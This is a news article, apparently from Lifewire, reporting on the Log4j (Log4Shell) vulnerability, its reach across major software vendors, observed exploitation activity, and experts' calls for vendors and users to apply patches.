Cybersecurity experts are seeing a wide variety of use cases for the Log4j exploit already beginning to appear on the dark web, ranging from exploiting Minecraft servers to more high-profile issues they believe could potentially affect Apple iCloud. “This Log4j vulnerability has a trickle-down effect, impacting all large software providers that might use this component as part of their application packing,” John Hammond, Senior Security Researcher at Huntress, told Lifewire via email. “The security community has uncovered vulnerable applications from other technology manufacturers like Apple, Twitter, Tesla, [and] Cloudflare, among others. As we speak, the industry is still exploring the vast attack surface and risk this vulnerability poses.”
Fire in the Hole
The vulnerability tracked as CVE-2021-44228 and dubbed Log4Shell, has the highest severity score of 10 in the common vulnerability scoring system (CVSS). GreyNoise, which analyzes Internet traffic to pick up security signals of note, first observed activity for this vulnerability on December 9, 2021. That’s when weaponized proof-of-concept exploits (PoCs) began to appear, leading to a rapid increase of scanning and public exploitation on December 10, 2021, and through the weekend. Log4j is heavily integrated into a broad set of DevOps frameworks and enterprise IT systems and in end-user software and popular cloud applications. Explaining the severity of the vulnerability, Anirudh Batra, a threat analyst at CloudSEK, tells Lifewire via email that a threat actor could exploit it to run code on a remote server. “This has left even popular games like Minecraft also vulnerable. An attacker can exploit it just by posting a payload in the chatbox. Not only Minecraft, but other popular services like iCloud [and] Steam are also vulnerable,” Batra explained, adding that “triggering the vulnerability in an iPhone is as simple as changing the name of the device.”
Tip of the Iceberg
Cybersecurity company Tenable suggests that because Log4j is included in a number of web applications, and is used by a variety of cloud services, the full scope of the vulnerability won’t be known for some time. The company points to a GitHub repository that tracks the impacted services, which at the time of writing lists about three dozen manufacturers and services, including popular ones such as Google, LinkedIn, Webex, Blender, and others mentioned earlier. Till now, the vast majority of activity has been scanning, but exploitation and post-exploitation activities have also been seen. “Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” writes the Microsoft Threat Intelligence Center.
Batten Down the Hatches
It’s no surprise, then, that due to the ease of exploitation and prevalence of Log4j, Andrew Morris, Founder and CEO of GreyNoise, tells Lifewire that he believes the hostile activity will continue to increase over the next few days. The good news, however, is that Apache, the developers of the vulnerable library, has issued a patch to neuter the exploits. But it’s now up to individual software makers to patch up their versions to protect their customers. Kunal Anand, CTO of cybersecurity company Imperva, tells Lifewire over email that while most of the adversarial campaign exploiting the vulnerability is currently directed towards enterprise users, end-users need to stay vigilant and make sure they update their affected software as soon as patches are available. The sentiment was echoed by Jen Easterly, Director at the Cybersecurity and Infrastructure Security Agency (CISA). “End users will be reliant on their vendors, and the vendor community must immediately identify, mitigate, and patch the wide array of products using this software. Vendors should also be communicating with their customers to ensure end-users know that their product contains this vulnerability and should prioritize software updates,” said Easterly via a statement.
